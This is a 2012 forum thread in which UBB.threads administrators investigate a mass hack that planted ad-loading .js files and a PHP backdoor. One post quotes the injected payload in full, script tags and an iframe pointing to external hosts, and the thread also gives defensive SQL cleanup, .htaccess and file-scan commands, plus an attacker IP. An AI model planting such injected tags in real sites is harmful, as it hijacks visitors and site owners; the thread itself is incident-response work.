journeyman | Joined: Jan 2012 | Posts: 95
Unwanted Google Ads started appearing in threads on our forum this morning. Is this a hacker or what?
Pondboss Forum
journeyman | Joined: Sep 2008 | Posts: 82
Yeah, we've got the same thing in ours. I thought it was simply because we hadn't updated, but since you're running 7.5.6p2, I can only assume it's not just unpatched versions...
I don't have time to really dig into this for a few hours, but so far in my cursory overview it doesn't look like any of the static files have been altered (at least the mod dates haven't been changed...)
Personally I was hoping to roll back to backup, but it looks like the ads pre-date last night's backup and I don't want to roll back and lose an entire day if possible.
Last edited by bakerzdosen; 08/26/2012 10:10 AM.
journeyman | Joined: Sep 2008 | Posts: 82
I kind of thought that it might be malicious code stuck into the templates, but I'm just not seeing any indication that it is...
One interesting tidbit is that ads aren't showing up in our restricted forums, so obviously it couldn't be a site wide template modification.
journeyman | Joined: Sep 2008 | Posts: 82
OK, I found a .js file in our files directory that was being included in all new posts. I've still got to get to the bottom of this, but it looks like the same google ad customer hit both of our sites. google_ad_client="ca-pub-9610313674109446" On your site, try getting rid of the http://forums.pondboss.com/templates/xx.js file. That'll be a quick fix, but not a permanent one.
journeyman | Joined: Jan 2012 | Posts: 95
The ads are showing up in most all of our old threads as well. Also some signatures have the same problem.
journeyman | Joined: Sep 2008 | Posts: 82
I did report the abuse to google...
It does look like that file is still there on your site. Is there a reason you haven't removed or renamed it?
Former Developer | Joined: Jun 2006 | Posts: 9,242 Likes: 1
Just thought I'd pop in here, this appears to be a pretty large scale hack as they are targeting a large number of sites. At least 5 that I know of. Unsure of actual exploitable issue just yet, but since it seems to be happening on even patched versions, there is definitely some type of security issue they have found.
All the ones I have found have been an ads.js file, and it's either been in the gallery directory or in the templates/default directory.
journeyman | Joined: Sep 2008 | Posts: 82
Good to know Rick. Let me know if there is any info I can get to you about ours.
Former Developer | Joined: Jun 2006 | Posts: 9,242 Likes: 1
It's actually inserting the script call into the database as well, so when you pull up a post, the script call will be in there even after the exploit has been removed. What is odd on this part is it's only putting it into the POST_BODY field, not the POST_DEFAULT_BODY, so it doesn't seem it's being inserted via the normal add post method.
Former Developer | Joined: Jun 2006 | Posts: 9,242 Likes: 1
I'd also check your forum/includes directory...on 4 of the sites there has been an exploit script in there, title of 2011.php
journeyman | Joined: Sep 2008 | Posts: 82
Oh yeah, absolutely. Removing that script is a hack that simply gets rid of the ads. It doesn't do anything else.
Someone could come back and do exactly what they did before and we'd still have our pants down.
I would recommend people report this to google so that the people that did this don't get paid...
Former Developer | Joined: Jun 2006 | Posts: 9,242 Likes: 1
Well, two of the sites I have worked on, every post in the database was modified, several million, adding this to the end of the POST_BODY field:
<script src=http://snipershide.com/wp-content/texashunting.js></script><br /><script src=http://snipershide.com/wp-content/texashunting.js></script><script src=http://snipershide.com/wp-content/texashunting.js></script><br /><iframe src=http://forums.weddingbells.ca/tmp/index.html width=750 height=110></iframe>
It's a somewhat easy cleanup with a mysql replace, but it takes quite awhile. Anyone with this issue, I'd look at your ubbt_POSTS table, specifically at the POST_BODY field. It won't show up when editing the post, because the POST_DEFAULT_BODY field isn't altered, so you'll need to use some type of mysql tool.
Quick way to check would be to run the following SQL:
select count(*) from ubbt_POSTS where POST_BODY LIKE '%<iframe%' or POST_BODY LIKE '%<script%'
journeyman | Joined: Sep 2008 | Posts: 82
For those reading this, I think you want to add a % to the end of that select statement for it to work, e.g.:
select count(*) from ubbt_POSTS where POST_BODY LIKE '%<iframe%' or POST_BODY LIKE '%<script%'
Anybody want to give me a primer on mysql replace? Sweeping changes like that make me nervous. Especially with statements like this in the docs: "Currently, you cannot replace into a table and select from the same table in a subquery." Is it really as simple as:
update ubbt_POSTS set POST_BODY = replace(POST_BODY, '<script src=http://[path/to/inserted/jsfile]></script>', '');
journeyman | Joined: Sep 2008 | Posts: 82
Personally, I'm thinking of just not allowing "attachment uploads" until this is resolved... That would prevent the uploading of the .js files, but I'm not sure how they were able to inject the code into the database to begin with. That is obviously what worries me.
Joined: Jun 2006 | Posts: 16,366 Likes: 126
I talked with SD and a temporary "patch" could be to just take and use htpasswd on your admin directory so that the users with elevated permissions cannot access your control panel without knowing the password to it. To do this, create a .htaccess file in the admin directory containing:
# Start Authentication
AuthUserFile /path/to/a/file/named/.htpasswd
AuthType Basic
AuthName "UBB.Threads Control Panel"
Require valid-user
The file named .htpasswd should be under your web root (not accessible via your website) and needs to contain a user:encryptedpassword combination, one line per user (if you have multiple authorized admins, you can choose to share a password or have everyone have a different password, whatever); to generate an encoded crypt hash click here. An example would be:
gizmo:$1$3GfCWBPT$CIHAQSPgI9Y772j2CySul0
journeyman | Joined: Sep 2008 | Posts: 82
Cool, thanks Gizmo. I'm about to run the code I mentioned above on our DB. I did a quick dump/load into my test system and it appears that it ran OK (and really not as long as I would have expected):
mysql> update ubbt_POSTS set POST_BODY = replace(POST_BODY, '[code they inserted]', '');
Query OK, 789195 rows affected (3 min 25.85 sec)
Rows matched: 789343  Changed: 789195  Warnings: 0
mysql> select count(*) from ubbt_POSTS where POST_BODY LIKE '%<iframe%' or POST_BODY LIKE '%<script%'
    -> ;
+----------+
| count(*) |
+----------+
|        0 |
+----------+
1 row in set (13.15 sec)
Unfortunately, my test (home) server is probably faster than the "production" server, but even 5 minutes ain't bad for 789k rows IMHO. Here goes nothing.
Last edited by bakerzdosen; 08/26/2012 5:16 PM.
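A rehearsal of the cleanup discussed above (Rick's check query and the replace that bakerzdosen ran), as an added example that is not from the thread: Python's sqlite3 stands in for MySQL (both provide replace() and instr()), the rows are constructed, and the injected tail is the one Rick quoted. The replace runs in a transaction and is only committed if the check query drops to zero, so a row that still matches (a second payload variant, or a legitimate embed) is handed back for inspection instead of being silently left behind.

```python
import sqlite3

# Tail appended to POST_BODY on the sites Rick cleaned (quoted from his post).
INJECTED = (
    "<script src=http://snipershide.com/wp-content/texashunting.js></script><br />"
    "<script src=http://snipershide.com/wp-content/texashunting.js></script>"
    "<script src=http://snipershide.com/wp-content/texashunting.js></script><br />"
    "<iframe src=http://forums.weddingbells.ca/tmp/index.html width=750 height=110></iframe>"
)

# Rick's check query, with the trailing % the thread corrected.
FLAGGED = "POST_BODY LIKE '%<iframe%' OR POST_BODY LIKE '%<script%'"
CHECK_SQL = "SELECT count(*) FROM ubbt_POSTS WHERE " + FLAGGED
LIST_SQL = "SELECT POST_ID FROM ubbt_POSTS WHERE " + FLAGGED + " ORDER BY POST_ID"
# The replace bakerzdosen ran, narrowed with instr() so only rows that actually
# carry the payload are rewritten (MySQL and SQLite both have replace() and instr()).
CLEAN_SQL = ("UPDATE ubbt_POSTS SET POST_BODY = replace(POST_BODY, ?, '') "
             "WHERE instr(POST_BODY, ?) > 0")

# Constructed rows: POST_DEFAULT_BODY is what the editor shows, POST_BODY is the
# rendered copy the attacker appended to (the thread notes only POST_BODY changed).
SAMPLE_ROWS = [
    ("First post, untouched", "First post, untouched"),
    ("Second post", "Second post" + INJECTED),
    ("Third post", "Third post" + INJECTED + INJECTED),  # hit twice; replace() strips both
]
# Constructed legitimate embed: trips the check query but is not the payload.
LEGIT_EMBED = ("Video", "Video <iframe src=http://example.invalid/v width=1 height=1></iframe>")


def make_test_db(rows):
    """In-memory stand-in for ubbt_POSTS (the dump/load into a test DB from the thread)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ubbt_POSTS (POST_ID INTEGER PRIMARY KEY, "
               "POST_DEFAULT_BODY TEXT, POST_BODY TEXT)")
    db.executemany("INSERT INTO ubbt_POSTS (POST_DEFAULT_BODY, POST_BODY) VALUES (?, ?)", rows)
    db.commit()
    return db


def count_suspect(db):
    return db.execute(CHECK_SQL).fetchone()[0]


def rehearse_cleanup(db, payload):
    """Strip `payload` inside one transaction. Commit only if the check query drops
    to zero; otherwise roll back and return the rows still flagged for inspection."""
    before = count_suspect(db)
    changed = db.execute(CLEAN_SQL, (payload, payload)).rowcount
    after = count_suspect(db)
    leftovers = [row[0] for row in db.execute(LIST_SQL)]
    if after == 0:
        db.commit()
    else:
        db.rollback()
    return {"before": before, "changed": changed, "after": after,
            "committed": after == 0, "leftovers": leftovers}
```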
Pooh-Bah | Joined: Jan 2004 | Posts: 2,474 Likes: 3
Good luck mate, waiting to hear of your results...
Former Developer | Joined: Jun 2006 | Posts: 9,242 Likes: 1
Whoops, missed that trailing %, yeah. So, the one site I was working on they had uploaded the 2011.php script into the forums tmp/ directory. This script was being called externally for modifying the database rows. Still not sure how they got the file into there in the first place at this point.
Same file was found on two other servers, one in the includes directory and one in a directory completely outside the forum.
Last edited by Rick; 08/26/2012 5:52 PM.
journeyman | Joined: Sep 2008 | Posts: 82
Holy cow, maybe it's not faster at home. (I'm sure the fact that the "production" db is used more and well cached had something to do with this:)
Query OK, 789195 rows affected (1 min 56.18 sec)
Rows matched: 789359  Changed: 789195  Warnings: 0
HOWEVER, I actually had to reboot the stupid server (oh well, 441 days of uptime later...) because apache died on me while the sql statement was running and wouldn't start up again because 'something' was already listening on port 80. So, my advice is that if you want to avoid the risk of a reboot, stop apache while you run the sql replace command. Now to put on the .htpasswd file and I'll call it a day.
Last edited by bakerzdosen; 08/26/2012 5:54 PM.
Former Developer | Joined: Jun 2006 | Posts: 9,242 Likes: 1
For those that have SSH access to their server and want to get an idea of any files being modified or added that shouldn't have been, you can run this inside your public_html directory or your forums directory if you want to isolate it more:
find . -printf '%T@ %c %p\n' | sort -k 1n,1 -k 7 | cut -d' ' -f2- | grep 2012 | grep Aug
This will show you all files that have been modified in August. It could be a big list, but the most recently modified files will be at the bottom. This is how I found the 2011.php file.
Last edited by Rick; 08/26/2012 6:09 PM.
journeyman | Joined: Sep 2008 | Posts: 82
Gizmo,
Just a side note: You probably want to mention that the following should be in your apache config:
AllowOverride AuthConfig
I had to do that for ours as I wasn't using that config value until today.
Good luck to everyone dealing with this.
journeyman | Joined: Sep 2008 | Posts: 82
For those that have SSH access to their server and want to get an idea of any files being modified or added that shouldn't have been, you can run this inside your public_html directory or your forums directory if you want to isolate it more:
find . -printf '%T@ %c %p\n' | sort -k 1n,1 -k 7 | cut -d' ' -f2- | grep 2012 | grep Aug
This will show you all files that have been modified in August. It could be a big list, but the most recently modified files will be at the bottom. This is how I found the 2011.php file.
I found this works better as most of mine were sessions:
find . -printf '%T@ %c %p\n' | sort -k 1n,1 -k 7 | cut -d' ' -f2- | grep 2012 | grep Aug | grep -v sessions
Former Developer | Joined: Jun 2006 | Posts: 9,242 Likes: 1
I had sessions in there, until I just found a bad file in the sessions directory on the last site I worked on. So, you might want to at least scan that to make sure it's only session files in that directory.
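The same timestamp sweep as Rick's find command, as an added example that is not from the thread, with the caveat from the post above built in: files under sessions/ are skipped as churn unless they look like scripts, and ctime is compared alongside mtime because mtime can be set to any value while ctime only moves on a real change. The sample listing is constructed; the filenames are the ones reported in this thread.

```python
import os
import time

# Extensions that have no business under sessions/ (Rick found a bad file there).
SCRIPT_EXT = (".php", ".phtml", ".php5", ".js")


def cutoff(date_str):
    """Epoch seconds for a YYYY-MM-DD date, e.g. cutoff('2012-08-01') for 'August'."""
    return time.mktime(time.strptime(date_str, "%Y-%m-%d"))


def collect(root):
    """Walk root and return (relative path, mtime, ctime) per regular file: the
    same data the thread's find -printf '%T@ %c %p' command prints."""
    entries = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.stat(full)
            entries.append((os.path.relpath(full, root).replace(os.sep, "/"),
                            st.st_mtime, st.st_ctime))
    return entries


def suspicious_changes(entries, since, churn_dirs=("sessions",)):
    """Return (path, reason) pairs, oldest change first.
    Outside the churn dirs: flag anything whose mtime OR ctime is at/after `since`.
    Inside the churn dirs: skip the ordinary session turnover that the thread's
    `grep -v sessions` hides, but still flag script-looking files there."""
    flagged = []
    for path, mtime, ctime in entries:
        latest = max(mtime, ctime)
        top = path.split("/")[0]
        ext = os.path.splitext(path)[1].lower()
        if top in churn_dirs:
            if ext in SCRIPT_EXT:
                flagged.append((latest, path, "script file in churn dir"))
        elif latest >= since:
            flagged.append((latest, path, "changed since cutoff"))
    flagged.sort()
    return [(path, reason) for _latest, path, reason in flagged]


# Constructed sample listing (names are the ones reported in the thread).
SINCE = 1000.0
SAMPLE_ENTRIES = [
    ("index.php", 10.0, 10.0),                     # old, untouched
    ("includes/admin_2011.php", 10.0, 1500.0),     # mtime backdated, ctime gives it away
    ("templates/default/ads.js", 1200.0, 1200.0),  # dropped-in ad loader
    ("sessions/sess_0001", 1600.0, 1600.0),        # normal session churn, ignored
    ("sessions/2011.php", 1100.0, 1100.0),         # PHP under sessions/, flagged regardless of age
    ("tmp/index.html", 1300.0, 1300.0),            # recent file in tmp/
]
```

For a live run, pass `collect(".")` from the forum directory and `cutoff("2012-08-01")` as `since`.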
journeyman | Joined: Sep 2008 | Posts: 82
Touché... Good point. Mine were all sessions, and I'm totally self-centered.
journeyman | Joined: Sep 2008 | Posts: 82
I'd also check your forum/includes directory...on 4 of the sites there has been an exploit script in there, title of 2011.php
Oh, I forgot to mention, my file was named admin_2011.php. I was just assuming that was it simply by your description, so I moved it. Is there an easy way to prevent .php files from being uploaded to the includes directory? I'm tempted to just run an rm *.php on that directory every minute if not.
journeyman | Joined: Sep 2008 | Posts: 82
OK, one more thing: Here's the link to report these guys for your site:
http://support.google.com/adsense/b...s.cs&ts=1190500&ctx=as2&rd=1
Select "An AdSense violation regarding the content of a website or AdSense ad placement on a website" and then "Yes". Then the option appears for "Ad code that has been placed on your site without your permission". I just added the contents of the .js file to this page, which should be enough because it has their unique id in it.
Former Developer | Joined: Jun 2006 | Posts: 9,242 Likes: 1
No real way to prevent them from being uploaded. I've seen them uploaded to any writable directory. It appears they've found some way to exploit one of the scripts that is allowing them to get files uploaded into any directory as long as it's writable by the webserver.
Normally I can track this type of thing down by looking at the timestamp of the uploaded file and comparing it to the access logs to see what script was being accessed at that time, but every one I've worked on today has had their access logs turned off, so no luck.
journeyman | Joined: Jan 2012 | Posts: 95
I did rename the xx.js file and that has kept the ads off our forum since I did it. Thanks for the tip!
Since we don't have a programmer or database guy, I am waiting for a canned fix and patch so it doesn't happen again.
stranger | Joined: Dec 2006 | Posts: 1
I found a new file in the ubb_js/ folder. The name of the file was our domain (minus the .com) + .js
I still need to figure out what is calling it (i.e. maybe the posts) but for now, I'm just deleting the data from the file.
journeyman | Joined: Sep 2008 | Posts: 82
Yup. That was the name of our .js file...
And chances are it's the same thing calling it (the posts). Read through the rest of the posts for SQL to verify it.
Last edited by bakerzdosen; 08/27/2012 11:40 AM.
stranger | Joined: Sep 2007 | Posts: 6
In case this helps anyone:
Our admin found an entry point in the templates folder: admin.php
He removed it, verified the folder permissions, and emptied the javascript file that was injected.
He traced the injection IP to 118.253.10.255
We sent an email to abuse.szx@2118.com.cn, which is where that IP traced to, and then did the Google Adwords abuse report.
Joined: Dec 2003 | Posts: 6,628 Likes: 85
Okay, I will be the devil's advocate. More details are needed.
Not all of the users here have stated what version they currently are using nor if they have installed the latest patch. I noticed at least one is not on a current patch. Also, even if you are using the current patch, what did you do to clean up your existing files? Meaning, did the intrusion happen after installation of the patch or before? Just because you just noticed it does not mean it was not there before.
I personally have not been hacked. But it seems to me that more info is needed to determine what actually is going on.
For example I don't see evidence here that it happened. So why?
Blue Man Group There is no such thing as stupid questions. Just stupid answers
member | Joined: Jun 2006 | Posts: 106
There could very well be something else besides UBB that's the entry point.
I'd like to know where the affected boards are hosted and more info on the servers and what else is on them. e.g. mysql, php, apache versions, do these affected sites also have wordpress, drupal, etc using the same database, etc.
Joined: Dec 2003 | Posts: 6,628 Likes: 85
There could very well be something else besides UBB that's the entry point.
I'd like to know where the affected boards are hosted and more info on the servers and what else is on them. e.g. mysql, php, apache versions, do these affected sites also have wordpress, drupal, etc using the same database, etc.
Agreed. Till some official investigation is performed, how do we know? Crisis management is not the way to approach this, even though the users impacted by this have a high level of urgency. BTW, Happy Birthday!
Blue Man Group There is no such thing as stupid questions. Just stupid answers
Former Developer | Joined: Jun 2006 | Posts: 9,242 Likes: 1
Of the 7 sites I've worked on, 3 of them are on all separate servers, with the latest patch, and the forums are the only thing on each server. So, I can't vouch for the other 4, as there are wordpress installs, other websites, etc. But the 3 sites, they are specifically forums only with no other websites. 2 servers have cPanel, and the other is just bare bones, no cPanel.
All 3 servers running CentOS, updated versions, mysql, apache, etc.
If I can find any relevant info on how it's happening, I'll surely post. I've just been playing cleanup on these sites since yesterday. First report was on Saturday evening, and then other reports throughout the day yesterday.
Last edited by Rick; 08/27/2012 3:47 PM.
journeyman | Joined: Sep 2008 | Posts: 82
OK, here's ours:
CentOS running on "bare metal" (now fully patched, but it wasn't before - it'd been a few months) mysql, apache. Nothing else running on the server (OK, ssh is running, but I've tried to lock it down as best I could, but I would bet that there is at least one thing running on there that shouldn't be. I'm just more of a Solaris guy.) No cPanel (ugh) or other crutches.
7.5.6 (no patches - yeah, I've gotta get on that. Supposedly we've paid our annual support but no one can find that number. I've just been too busy to track it down - For example, I'm in a hotel room 1500 miles from my last post in this thread...)
If there is any other info that would be helpful to provide, let me know.
Addict | Joined: Mar 2007 | Posts: 522
I thought the patch was available to anyone, regardless of renewal status, but I could be wrong.
Steve
UBB.classic from 2000-2003 UBB.threads from 2003-present!
Addict | Joined: Mar 2007 | Posts: 522
I just looked at the dates involved, and my subscription was expired when I downloaded the p1 and p2 patches.
Steve
UBB.classic from 2000-2003 UBB.threads from 2003-present!
journeyman | Joined: Sep 2008 | Posts: 82
Nope. Unless it's changed since I asked.
journeyman | Joined: Jan 2012 | Posts: 95
We have a dedicated server at Hostway (SiteControl) with all the latest versions of everything. The server was setup new and the forum was migrated there a few months ago. The server is dedicated to our forums and there is nothing else running on it.
One of your guys upgraded us to 7.5.6p2 a few months ago. Brooks got us a quote and arranged to get the job done. I am not sure who did the actual work. Should be perfect, right?